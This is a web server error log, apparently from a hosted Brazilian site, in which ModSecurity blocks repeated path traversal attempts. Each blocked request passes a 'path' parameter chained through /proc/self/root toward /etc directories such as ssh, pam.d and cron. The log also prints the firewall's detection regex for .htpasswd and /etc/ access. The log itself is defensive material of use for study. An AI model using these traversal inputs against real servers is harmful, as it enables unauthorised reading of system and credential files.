https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:37:05.620478 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.243.128:38266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRQaBJNF7axNlVR0UaSwAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:37:08.075161 2026] [proxy_fcgi:error] [pid 29151:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:44932] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:37:20.563048 2026] [:error] [pid 29151:tid 140411590858496] [client 74.7.241.31:48232] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRUPPqhzTj3BvfDX-KTwAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:37:29.125817 2026] [proxy_fcgi:error] [pid 2598:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:45268] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:37:35.546423 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.241.31:38072] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRXweiSKl8TjouI-YcAQAAA9U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:37:42.723600 2026] [:error] [pid 7437:tid 140411624429312] [client 74.7.241.31:45670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRZgeiSKl8TjouI-YcBgAAA84"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:37:51.113830 2026] [proxy_fcgi:error] [pid 29151:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:45632] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:38:00.476612 2026] [:error] [pid 2598:tid 140411565680384] [client 74.7.241.31:37620] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmReBj0p0SRWAqcjGF8AAAAAxU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:38:12.126421 2026] [proxy_fcgi:error] [pid 7437:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:45986] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:38:15.631881 2026] [:error] [pid 9299:tid 140411725141760] [client 74.7.243.128:49742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRh7-sgTmmJoPuMdy43AAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:38:19.891346 2026] [:error] [pid 6296:tid 140411641214720] [client 74.7.228.61:35466] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmRi3Ik7brgkOH-rIWODgAAAUw"]
[Tue Mar 17 14:38:20.656118 2026] [:error] [pid 6296:tid 140411607643904] [client 74.7.244.43:54470] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmRjHIk7brgkOH-rIWODwAAAVA"]
[Tue Mar 17 14:38:28.747595 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.243.128:51232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRlAeiSKl8TjouI-YcEwAAA9U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:38:33.100383 2026] [proxy_fcgi:error] [pid 9299:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:46276] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:38:36.439019 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.241.31:46660] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRnNY0UrI5A3LftIz-pwAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:38:38.097634 2026] [:error] [pid 7004:tid 140411599251200] [client 74.7.241.31:36904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRnsU6Sx0TG1YjmQixgQAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:38:43.573993 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.241.31:36918] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRo9Y0UrI5A3LftIz-rwAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:38:48.058906 2026] [:error] [pid 29151:tid 140411725141760] [client 74.7.241.31:36924] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRqPPqhzTj3BvfDX-KYgAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:38:49.474752 2026] [:error] [pid 18380:tid 140411691570944] [client 74.7.241.31:35788] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRqa4xEDsg_V3ESNZO4QAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:38:54.089785 2026] [proxy_fcgi:error] [pid 18380:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:46850] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:38:54.196904 2026] [:error] [pid 7437:tid 140411540502272] [client 74.7.241.31:35796] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRrgeiSKl8TjouI-YcGQAAA9g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:39:01.431505 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:35798] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRtdY0UrI5A3LftIz-tQAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:39:04.637922 2026] [:error] [pid 17965:tid 140411716749056] [client 74.7.241.31:48510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRuKt8Nd0UC_OcbVHNfQAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:39:13.067093 2026] [:error] [pid 7004:tid 140411548894976] [client 74.7.241.31:48518] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRwcU6Sx0TG1YjmQixowAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:39:15.120410 2026] [proxy_fcgi:error] [pid 18380:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:47458] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:39:21.799178 2026] [:error] [pid 2598:tid 140411708356352] [client 74.7.243.128:48116] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmRyRj0p0SRWAqcjGF8LwAAAwQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:39:36.129897 2026] [proxy_fcgi:error] [pid 2473:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:48088] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:39:37.621214 2026] [:error] [pid 9299:tid 140411674785536] [client 74.7.241.31:34602] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmR2b-sgTmmJoPuMdy49wAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:39:39.346150 2026] [:error] [pid 29151:tid 140411741927168] [client 74.7.241.31:36252] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmR2_PqhzTj3BvfDX-KdAAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
